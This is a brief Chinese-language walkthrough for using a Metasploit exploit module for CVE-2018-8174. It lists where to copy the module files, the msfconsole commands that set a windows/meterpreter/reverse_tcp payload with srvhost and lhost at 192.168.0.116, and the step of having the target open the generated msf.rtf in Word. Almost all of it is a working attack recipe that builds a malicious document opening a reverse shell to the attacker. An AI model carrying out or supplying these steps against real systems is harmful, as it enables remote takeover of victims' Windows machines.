在GitHub上下载metasploit模块在本地
将.rb复制到 fileformat 目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat/
将.rtf复制到 exploits 目录/usr/share/metasploit-framework/data/exploits/
启动模块
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116 exploit
进入 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开
即可